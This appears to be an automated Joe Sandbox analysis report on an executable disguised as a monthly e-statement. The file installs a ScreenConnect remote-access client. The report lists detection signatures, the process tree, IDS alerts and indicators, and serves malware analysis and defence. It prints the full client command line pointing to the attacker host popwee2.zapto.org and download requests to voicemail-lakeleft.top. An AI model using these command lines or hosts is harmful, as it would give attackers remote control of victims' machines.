Windows Analysis Report
monthly-eStatementForum120478962.Client.exe

Overview

General Information

Sample name: monthly-eStatementForum120478962.Client.exe
Analysis ID: 1551950
MD5: 27bd2490fd75556aab2df57ea7c1147f
SHA1: 4eb9656ede1fed23fdaeb67815afcd489ded0f77
SHA256: 7d6376247db9e267f27d1d6bf32b48afcab0ad277706fc0135d803645f7852a5

Detection

ScreenConnect Tool
Score: 51
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Compliance

Score: 33
Range: 0 - 100

Signatures

.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to hide user accounts
Detected potential unwanted application
Enables network access during safeboot for specific services
Reads the Security eventlog
Reads the System eventlog
AV process strings found (often used to terminate AV products)
Adds / modifies Windows certificates
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops certificate files (DER)
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
Modifies existing windows services
One or more processes crash
PE file contains an invalid checksum
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Dfsvc.EXE Network Connection To Uncommon Ports
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool

Classification

  • System is w10x64
  • monthly-eStatementForum120478962.Client.exe (PID: 2260 cmdline: "C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exe" MD5: 27BD2490FD75556AAB2DF57EA7C1147F)
    • dfsvc.exe (PID: 6172 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe" MD5: B4088F44B80D363902E11F897A7BAC09)
      • ScreenConnect.WindowsClient.exe (PID: 5432 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe" MD5: 20AB8141D958A58AADE5E78671A719BF)
        • ScreenConnect.ClientService.exe (PID: 5764 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=popwee2.zapto.org&p=8041&s=4b43e651-6d21-48a4-a5c8-8436b8ee48ae&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Newboom%20Session" "1" MD5: 361BCC2CB78C75DD6F583AF81834E447)
    • WerFault.exe (PID: 1864 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 700 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 3224 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 4464 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 2260 -ip 2260 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 2972 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 3524 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • ScreenConnect.ClientService.exe (PID: 1440 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=popwee2.zapto.org&p=8041&s=4b43e651-6d21-48a4-a5c8-8436b8ee48ae&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Newboom%20Session" "1" MD5: 361BCC2CB78C75DD6F583AF81834E447)
    • ScreenConnect.WindowsClient.exe (PID: 3836 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe" "RunRole" "d9b9f156-2a83-4b1f-b5ba-62c20ee02a77" "User" MD5: 20AB8141D958A58AADE5E78671A719BF)
  • cleanup
No configs have been found
| Source | Rule | Description | Author | Strings |
| --- | --- | --- | --- | --- |
| C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | |
| C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | |

| Source | Rule | Description | Author | Strings |
| --- | --- | --- | --- | --- |
| 00000009.00000000.2436546858.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | |
| 00000002.00000002.2973425425.0000025D1D9AB000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | |
| Process Memory Space: dfsvc.exe PID: 6172 | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | |
| Process Memory Space: ScreenConnect.WindowsClient.exe PID: 5432 | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | |
| Process Memory Space: ScreenConnect.ClientService.exe PID: 5764 | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | |

| Source | Rule | Description | Author | Strings |
| --- | --- | --- | --- | --- |
| 9.0.ScreenConnect.WindowsClient.exe.ba0000.0.unpack | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | |

System Summary

Source: Network Connection Author: Nasreddine Bencherchali (Nextron Systems): Data: DestinationIp: 192.168.2.5, DestinationIsIpv6: false, DestinationPort: 49705, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Initiated: true, ProcessId: 6172, Protocol: tcp, SourceIp: 194.59.30.201, SourceIsIpv6: false, SourcePort: 443
Source: Process started Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, ProcessId: 3224, ProcessName: svchost.exe

| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
| --- | --- | --- | --- | --- | --- | --- | --- | --- |
| 2024-11-08T11:01:18.080245+0100 | 2022930 | 1 | A Network Trojan was detected | 20.109.210.53 | 443 | 192.168.2.5 | 49729 | TCP |
| 2024-11-08T11:01:55.669523+0100 | 2022930 | 1 | A Network Trojan was detected | 20.109.210.53 | 443 | 192.168.2.5 | 49930 | TCP |

| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
| --- | --- | --- | --- | --- | --- | --- | --- | --- |
| 2024-11-08T11:01:13.781744+0100 | 2009897 | 1 | A Network Trojan was detected | 194.59.30.201 | 443 | 192.168.2.5 | 49722 | TCP |
| 2024-11-08T11:01:15.767488+0100 | 2009897 | 1 | A Network Trojan was detected | 194.59.30.201 | 443 | 192.168.2.5 | 49724 | TCP |
| 2024-11-08T11:01:21.003552+0100 | 2009897 | 1 | A Network Trojan was detected | 194.59.30.201 | 443 | 192.168.2.5 | 49736 | TCP |
| 2024-11-08T11:01:22.684812+0100 | 2009897 | 1 | A Network Trojan was detected | 194.59.30.201 | 443 | 192.168.2.5 | 49743 | TCP |
| 2024-11-08T11:01:25.138450+0100 | 2009897 | 1 | A Network Trojan was detected | 194.59.30.201 | 443 | 192.168.2.5 | 49756 | TCP |
| 2024-11-08T11:01:26.702035+0100 | 2009897 | 1 | A Network Trojan was detected | 194.59.30.201 | 443 | 192.168.2.5 | 49767 | TCP |
| 2024-11-08T11:01:32.679860+0100 | 2009897 | 1 | A Network Trojan was detected | 194.59.30.201 | 443 | 192.168.2.5 | 49802 | TCP |
| 2024-11-08T11:01:37.035829+0100 | 2009897 | 1 | A Network Trojan was detected | 194.59.30.201 | 443 | 192.168.2.5 | 49818 | TCP |

AV Detection

Source: Submitted Sample Integrated Neural Analysis Model: Matched 93.5% probability
Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exe Code function: 0_2_009A1000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_009A1000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe EXE: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe EXE: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe EXE: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe EXE: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe

Compliance

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe EXE: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe EXE: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe EXE: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe EXE: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe
Source: monthly-eStatementForum120478962.Client.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: monthly-eStatementForum120478962.Client.exe Static PE information: certificate valid
Source: unknown HTTPS traffic detected: 194.59.30.201:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 194.59.30.201:443 -> 192.168.2.5:49728 version: TLS 1.2
Source: unknown HTTPS traffic detected: 194.59.30.201:443 -> 192.168.2.5:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 194.59.30.201:443 -> 192.168.2.5:49736 version: TLS 1.2
Source: monthly-eStatementForum120478962.Client.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsFileManager.exe0.2.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: dfsvc.exe, 00000002.00000002.2973425425.0000025D1D8E9000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2973425425.0000025D1DB2A000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2447633526.0000000002CA2000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.2.dr, ScreenConnect.Client.dll0.2.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb source: monthly-eStatementForum120478962.Client.exe
Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 00000002.00000002.2973425425.0000025D1DB2A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2973425425.0000025D1D8E5000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2973425425.0000025D1DDBC000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000A.00000002.2445494046.00000000027A2000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 0000000C.00000002.3289162550.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000C.00000002.3288573826.00000000012B0000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.dll.2.dr, ScreenConnect.ClientService.dll0.2.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbe source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2436546858.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsClient.exe.2.dr
Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 0000000A.00000000.2441384367.00000000009BD000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 00000002.00000002.2973425425.0000025D1D916000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2973425425.0000025D1DB2A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2973425425.0000025D1DC3E000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2451601548.000000001BEB2000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Windows.dll0.2.dr, ScreenConnect.Windows.dll.2.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2436546858.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsClient.exe.2.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbW] source: dfsvc.exe, 00000002.00000002.2973425425.0000025D1D916000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2973425425.0000025D1DB2A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2973425425.0000025D1DC3E000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2451601548.000000001BEB2000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Windows.dll0.2.dr, ScreenConnect.Windows.dll.2.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 00000002.00000002.2973425425.0000025D1D8E9000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2973425425.0000025D1DB2A000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2447633526.0000000002CA2000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.2.dr, ScreenConnect.Client.dll0.2.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 00000002.00000002.2973425425.0000025D1D738000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2973425425.0000025D1DB2A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2973425425.0000025D1DC3E000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000A.00000002.2446246290.0000000004CB2000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.Core.dll0.2.dr, ScreenConnect.Core.dll.2.dr
Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exe Code function: 0_2_009A4A4B FindFirstFileExA,0_2_009A4A4B
Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe File opened: C:\Users\user\AppData\Local\Apps\2.0\
Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe File opened: C:\Users\user\AppData\Local\
Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe File opened: C:\Users\user\AppData\
Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe File opened: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\
Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe File opened: C:\Users\user\
Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe File opened: C:\Users\user\AppData\Local\Apps\

Networking

Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe Registry value created: NULL Service
Source: global traffic TCP traffic: 192.168.2.5:49860 -> 194.59.30.201:8041
Source: global traffic HTTP traffic detected: GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=popwee2.zapto.org&p=8041&s=4b43e651-6d21-48a4-a5c8-8436b8ee48ae&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Newboom%20Session HTTP/1.1 Host: voicemail-lakeleft.top Accept-Encoding: gzip Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Bin/ScreenConnect.Client.manifest HTTP/1.1 Host: voicemail-lakeleft.top Accept-Encoding: gzip
Source: global traffic HTTP traffic detected: GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1 Host: voicemail-lakeleft.top Accept-Encoding: gzip
Source: global traffic HTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1 Host: voicemail-lakeleft.top Accept-Encoding: gzip Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1 Host: voicemail-lakeleft.top Accept-Encoding: gzip Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1 Host: voicemail-lakeleft.top Accept-Encoding: gzip Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1 Host: voicemail-lakeleft.top Accept-Encoding: gzip Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1 Host: voicemail-lakeleft.top Accept-Encoding: gzip Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Bin/ScreenConnect.Client.dll HTTP/1.1 Host: voicemail-lakeleft.top Accept-Encoding: gzip Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1 Host: voicemail-lakeleft.top Accept-Encoding: gzip Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Bin/ScreenConnect.Windows.dll HTTP/1.1 Host: voicemail-lakeleft.top Accept-Encoding: gzip
Source: global traffic HTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1 Host: voicemail-lakeleft.top Accept-Encoding: gzip
Source: global traffic HTTP traffic detected: GET /Bin/ScreenConnect.Core.dll HTTP/1.1 Host: voicemail-lakeleft.top Accept-Encoding: gzip
Source: Joe Sandbox View IP Address: 194.59.30.201 194.59.30.201
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Network traffic Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 194.59.30.201:443 -> 192.168.2.5:49722
Source: Network traffic Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 194.59.30.201:443 -> 192.168.2.5:49756
Source: Network traffic Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.5:49729
Source: Network traffic Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 194.59.30.201:443 -> 192.168.2.5:49724
Source: Network traffic Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 194.59.30.201:443 -> 192.168.2.5:49743
Source: Network traffic Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 194.59.30.201:443 -> 192.168.2.5:49736
Source: Network traffic Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 194.59.30.201:443 -> 192.168.2.5:49802
Source: Network traffic Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.5:49930
Source: Network traffic Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 194.59.30.201:443 -> 192.168.2.5:49767
Source: Network traffic Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 194.59.30.201:443 -> 192.168.2.5:49818
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: voicemail-lakeleft.top
Source: global traffic DNS traffic detected: DNS query: popwee2.zapto.org
                  Source: monthly-eStatementForum120478962.Client.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                  Source: monthly-eStatementForum120478962.Client.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                  Source: monthly-eStatementForum120478962.Client.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                  Source: ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
